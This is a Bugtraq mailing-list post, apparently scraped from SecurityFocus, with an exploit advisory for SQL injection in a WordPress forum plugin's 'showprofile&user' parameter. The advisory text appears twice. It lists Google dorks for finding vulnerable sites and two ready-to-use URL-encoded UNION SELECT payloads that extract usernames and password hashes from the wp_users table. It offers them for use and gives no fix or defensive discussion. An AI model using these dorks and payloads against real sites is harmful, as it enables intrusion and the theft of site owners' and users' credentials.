Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
WordPress forumaction (PAGE_id)(user)SQL Injection
Feb 16 2008 04:49PM
hackturkiye hackturkiye gmail com
########################################################################
#
#
# WordPress forumaction(PAGE_İD)(user)SQL Injection
#
########################################################################
#
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#
########################################################################
#
#
# DORK 1 : allinurl: forumaction "showprofile"
#
DORK 2 : allinurl: page_id user "showprofile"
DORK 3 : allinurl:"forum/?forumaction"
########################################################################
##
#
# showprofile&user=SQL Injection(EXPLOİT)
#
########################################################################
###
EXPLOİT 1
showprofile&user=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cco
ncat(0x7c,user_login,0x7c,user_pass,0x7c)%2C0%2C0%2C0%2C0x7c%2C0%2F%2A%2
A%2Ffrom%2F%2A%2A%2Fwp_users
EXPLOİT 2
showprofile&user=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%
2C0%2C0%2C0x7c%2C0%2C0%2C0%2Cconcat(0x7c,user_login,0x7c,user_pass,0x7c)
%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users
########################################################################
##
# S@BUN GOOD LUCKY S@BUN
########################################################################
##
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
#
#
# WordPress forumaction(PAGE_İD)(user)SQL Injection
#
########################################################################
#
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#
########################################################################
#
#
# DORK 1 : allinurl: forumaction "showprofile"
#
DORK 2 : allinurl: page_id user "showprofile"
DORK 3 : allinurl:"forum/?forumaction"
########################################################################
##
#
# showprofile&user=SQL Injection(EXPLOİT)
#
########################################################################
###
EXPLOİT 1
showprofile&user=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cco
ncat(0x7c,user_login,0x7c,user_pass,0x7c)%2C0%2C0%2C0%2C0x7c%2C0%2F%2A%2
A%2Ffrom%2F%2A%2A%2Fwp_users
EXPLOİT 2
showprofile&user=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0%
2C0%2C0%2C0x7c%2C0%2C0%2C0%2Cconcat(0x7c,user_login,0x7c,user_pass,0x7c)
%2C0%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users
########################################################################
##
# S@BUN GOOD LUCKY S@BUN
########################################################################
##
[ reply ]